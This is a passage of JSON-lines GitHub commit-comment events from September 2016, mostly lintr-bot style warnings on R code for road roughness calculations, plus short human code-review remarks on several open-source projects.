1),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/collect_file_esses.R:40:1:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L40) *style:* **lines should not be more than 80 characters.**\n```r\n​     ai  = rep(seq(1, n_alignments   ), each = n_beast_runs, times = n_species_trees),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/collect_file_esses.R:51:1:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L51) *style:* **lines should not be more than 80 characters.**\n```r\n​            traces = Cer2016::get_posterior(file, sti = sti, ai = ai, pi = pi)$estimates,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-08T15:00:33Z"}
{"id":"4534590414","type":"CommitCommentEvent","actor":{"login":"build000"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":18946277,"position":null,"line":null,"path":null,"commit_id":"e9f86c6cac1802eca052f98d3a5874521b2a87cd","created_at":"2016-09-08T15:00:34Z","updated_at":"2016-09-08T15:00:34Z","body":"whether it solves the problem? : https://bugs.lede-project.org/index.php?do=details&task_id=149"}},"created_at":"2016-09-08T15:00:34Z"}
{"id":"4534592999","type":"CommitCommentEvent","actor":{"login":"pluskid"},"repo":{"name":"dmlc/mxnet"},"payload":{"comment":{"id":18946281,"position":4,"line":111,"path":"tests/travis/run_test.sh","commit_id":"3e15f6288609419e7bf5aa3119b1212eaeeec8be","created_at":"2016-09-08T15:00:56Z","updated_at":"2016-09-08T15:00:56Z","body":"@javelinjs It seemed so. Don't worry, we have added it back. :)"}},"created_at":"2016-09-08T15:00:56Z"}
{"id":"4534593206","type":"CommitCommentEvent","actor":{"login":"joshcoughlan"},"repo":{"name":"chef-cookbooks/yum-epel"},"payload":{"comment":{"id":18946282,"position":10,"line":4,"path":"attributes/epel-testing.rb","commit_id":"a494a64333ebb600d57cf4a5c9226ecaf2baa1d9","created_at":"2016-09-08T15:00:58Z","updated_at":"2016-09-08T15:00:58Z","body":"Shouldn't this be \"default['yum']['epel-testing'][...]\", not default['yum']['epel-testing-source'][...]"}},"created_at":"2016-09-08T15:00:58Z"}
{"id":"4534597905","type":"CommitCommentEvent","actor":{"login":"nipun0212"},"repo":{"name":"GoogleCloudPlatform/go-endpoints"},"payload":{"comment":{"id":18946293,"position":null,"line":null,"path":null,"commit_id":"eb61a125f865cdaa3f708ec5b9fba0e290c59115","created_at":"2016-09-08T15:01:36Z","updated_at":"2016-09-08T15:01:36Z","body":"@broady What can be the reason for Google not to have a official google cloud endpoints package for Golang."}},"created_at":"2016-09-08T15:01:36Z"}
{"id":"4534598910","type":"CommitCommentEvent","actor":{"login":"gulyx"},"repo":{"name":"LearnPAd/learnpad"},"payload":{"comment":{"id":18946294,"position":null,"line":null,"path":null,"commit_id":"441af1fffdb9fdbc7b7ecca8181fc7d37c45c443","created_at":"2016-09-08T15:01:45Z","updated_at":"2016-09-08T15:01:45Z","body":"@tomjorquera but I guess I tested this solution, but the error was still rose.\r\nAre you sure this is the only modification we need? "}},"created_at":"2016-09-08T15:01:45Z"}
{"id":"4534598930","type":"CommitCommentEvent","actor":{"login":"oli-g"},"repo":{"name":"anryko/grafana-influx-dashboard"},"payload":{"comment":{"id":18946295,"position":73,"line":712,"path":"getdash.conf.js","commit_id":"d55d98ced609e1eb4e948390102528fdd15f8d9d","created_at":"2016-09-08T15:01:45Z","updated_at":"2016-09-08T15:01:45Z","body":"Same here, set a color please."}},"created_at":"2016-09-08T15:01:45Z"}
{"id":"4534600938","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"vsimko/rroad"},"payload":{"comment":{"id":18946303,"position":null,"line":null,"path":null,"commit_id":"5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00","created_at":"2016-09-08T15:02:03Z","updated_at":"2016-09-08T15:02:03Z","body":"[inst/kla/experiments.R:3:24:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L3) *warning:* **Do not use absolute paths.**\n```r\n​  plano <<- read.csv2(\"~/R_projects/rroad/inst/kla/ow_plano.csv\")\n                       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:19:29:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​test_profile <- data.frame(x=x, profile=sapply(x, generate_test_profile))\n                           ~^~\n```\n[inst/kla/experiments.R:19:40:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​test_profile <- data.frame(x=x, profile=sapply(x, generate_test_profile))\n                                      ~^~\n```\n[inst/kla/experiments.R:21:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n​plot(x = test_profile$x, y = test_profile$profile, ylim = c(0, 8), xlim = c(0,25), type = \"l\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:21:79:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L21) *style:* **Commas should always have a space after.**\n```r\n​plot(x = test_profile$x, y = test_profile$profile, ylim = c(0, 8), xlim = c(0,25), type = \"l\")\n                                                                              ^\n```\n[inst/kla/experiments.R:22:47:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​lines(x = test_profile$x, y = test_profile$iri*10)\n                                             ~^~\n```\n[inst/kla/experiments.R:33:17:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L33) *style:* **Commas should always have a space after.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                ^\n```\n[inst/kla/experiments.R:33:31:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                             ~^~\n```\n[inst/kla/experiments.R:33:50:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L33) *style:* **Commas should always have a space after.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                                                 ^\n```\n[inst/kla/experiments.R:33:52:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                                                  ~^~\n```\n[inst/kla/experiments.R:34:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L34) *style:* **lines should not be more than 80 characters.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:34:5:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n    ^\n```\n[inst/kla/experiments.R:34:20:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n                  ~^~\n```\n[inst/kla/experiments.R:34:38:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n                                    ~^~\n```\n[inst/kla/experiments.R:34:62:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L34) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n                                                             ^\n```\n[inst/kla/experiments.R:39:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:39:35:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L39) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                  ^\n```\n[inst/kla/experiments.R:39:58:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                        ~^~\n```\n[inst/kla/experiments.R:39:69:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                                   ~^~\n```\n[inst/kla/experiments.R:39:71:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                                     ~^~\n```\n[inst/kla/experiments.R:39:91:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L39) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                                                          ^\n```\n[inst/kla/experiments.R:42:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L42) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:43:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L43) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:44:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L44) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:45:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L45) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:46:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/inst/kla/experiments.R#L46) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/iri.R:22:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​  CalculateIRIperSegmentsOverlapping(profile, iri_coef, segment.length, segment.length)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:45:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​CalculateIRIperSegmentsOverlapping <- function(profile, iri_coef, segment.length = 100, segment.offset = 20) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:51:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L51) *style:* **lines should not be more than 80 characters.**\n```r\n​  K <- max(2, as.integer(.5 + .25 / DX) + 1)  # number of profile points used to compute mvg avg slope input (window)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:52:3:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L52) *warning:* **local variable ‘BL’ assigned but may not be used**\n```r\n​  BL <- (K - 1) * DX  # baselength\n  ^~\n```\n[R/iri.R:54:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​  # split profile into segments by defining starting and ending indices (e.g. per 100m segment considering offsets)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:58:19:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L58) *style:* **Commas should always have a space after.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                  ^\n```\n[R/iri.R:58:34:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                ~^~\n```\n[R/iri.R:58:53:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L58) *style:* **Commas should always have a space after.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                                    ^\n```\n[R/iri.R:58:55:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                                     ~^~\n```\n[R/iri.R:59:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L59) *style:* **lines should not be more than 80 characters.**\n```r\n​  # if there is exactly one sample missing for calculating initial IRI for next segment, delete last segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:60:7:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L60) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n      ^\n```\n[R/iri.R:60:23:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n                     ~^~\n```\n[R/iri.R:60:41:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n                                       ~^~\n```\n[R/iri.R:63:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:63:37:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L63) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                    ^\n```\n[R/iri.R:63:61:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                           ~^~\n```\n[R/iri.R:63:85:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                   ~^~\n```\n[R/iri.R:63:87:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                     ~^~\n```\n[R/iri.R:63:107:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L63) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                                          ^\n```\n[R/iri.R:108:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L108) *style:* **lines should not be more than 80 characters.**\n```r\n​  K <- max(2, as.integer(.5 + .25 / DX) + 1)  # number of profile points used to compute mvg avg slope input (window)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:116:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n​  # sliding window of profil elevations for calculating mvg avg slope (buffer of length K)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:129:3:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L129) *warning:* **local variable ‘iri_df’ assigned but may not be used**\n```r\n​  iri_df <- data.frame()  # df for colleteing return values\n  ^~~~~~\n```\n[R/iri.R:152:10:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L152) *style:* **Put spaces around all infix operators.**\n```r\n​      y[j-1] <- y[j]\n        ~^~\n```\n[R/iri.R:160:29:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L160) *style:* **Commas should always have a space after.**\n```r\n​        z[j] <- z[j] + ST[j,jj] * z_last[jj]\n                            ^\n```\n[R/iri.R:163:24:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L163) *style:* **Put spaces around all infix operators.**\n```r\n​    rs <- rs + abs(z[1]- z[3])\n                      ~^\n```\n[R/iri.R:168:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/iri.R#L168) *style:* **lines should not be more than 80 characters.**\n```r\n​    # determine avg rs by dividing by number of considered samples and attach to result vector\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/rroad-package.R:30:1:](https://github.com/vsimko/rroad/blob/5fa9e53ca2467b676b3f6e0eb7a4c4ba852d3f00/R/rroad-package.R#L30) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-08T15:02:03Z"}
{"id":"4534601417","type":"CommitCommentEvent","actor":{"login":"mcgilman"},"repo":{"name":"mcgilman/nifi"},"payload":{"comment":{"id":18946304,"position":34,"line":143,"path":"nifi-nar-bundles/nifi-framework-bundle/nifi-framework/nifi-web/nifi-web-api/src/main/java/org/apache/nifi/web/api/DataTransferResource.java","commit_id":"b97714a4839c7c2536b0426b53e3f67858b89c5e","created_at":"2016-09-08T15:02:08Z","updated_at":"2016-09-08T15:02:08Z","body":"Providing access to the underlying component is done in other cases which necessitated it. It may not be necessary in this case so let me try to update this commit. Update to follow shortly."}},"created_at":"2016-09-08T15:02:08Z"}
{"id":"4534606295","type":"CommitCommentEvent","actor":{"login":"19379"},"repo":{"name":"19379/foo-jscript-panel"},"payload":{"comment":{"id":18946331,"position":null,"line":null,"path":null,"commit_id":"7d3716452d6bfcbbeadda91f07d5a915d943933c","created_at":"2016-09-08T15:02:48Z","updated_at":"2016-09-08T15:02:48Z","body":"I might put some of the offline scripts in with the next component release but I'm never sharing any online scripts again."}},"created_at":"2016-09-08T15:02:48Z"}
{"id":"4534607460","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"vsimko/rroad"},"payload":{"comment":{"id":18946336,"position":null,"line":null,"path":null,"commit_id":"565ef3a92e9da7133ad9a03524eb4b0b710fd842","created_at":"2016-09-08T15:02:57Z","updated_at":"2016-09-08T15:02:57Z","body":"[inst/kla/experiments.R:3:24:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L3) *warning:* **Do not use absolute paths.**\n```r\n​  plano <<- read.csv2(\"~/R_projects/rroad/inst/kla/ow_plano.csv\")\n                       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:19:29:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​test_profile <- data.frame(x=x, profile=sapply(x, generate_test_profile))\n                           ~^~\n```\n[inst/kla/experiments.R:19:40:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​test_profile <- data.frame(x=x, profile=sapply(x, generate_test_profile))\n                                      ~^~\n```\n[inst/kla/experiments.R:21:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n​plot(x = test_profile$x, y = test_profile$profile, ylim = c(0, 8), xlim = c(0,25), type = \"l\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:21:79:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L21) *style:* **Commas should always have a space after.**\n```r\n​plot(x = test_profile$x, y = test_profile$profile, ylim = c(0, 8), xlim = c(0,25), type = \"l\")\n                                                                              ^\n```\n[inst/kla/experiments.R:22:47:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​lines(x = test_profile$x, y = test_profile$iri*10)\n                                             ~^~\n```\n[inst/kla/experiments.R:33:17:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L33) *style:* **Commas should always have a space after.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                ^\n```\n[inst/kla/experiments.R:33:31:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                             ~^~\n```\n[inst/kla/experiments.R:33:50:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L33) *style:* **Commas should always have a space after.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                                                 ^\n```\n[inst/kla/experiments.R:33:52:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​starts <- seq(1,profile_length-buffer_look_ahead,by=seg_length)\n                                                  ~^~\n```\n[inst/kla/experiments.R:34:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L34) *style:* **lines should not be more than 80 characters.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:34:5:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n    ^\n```\n[inst/kla/experiments.R:34:20:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n                  ~^~\n```\n[inst/kla/experiments.R:34:38:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n                                    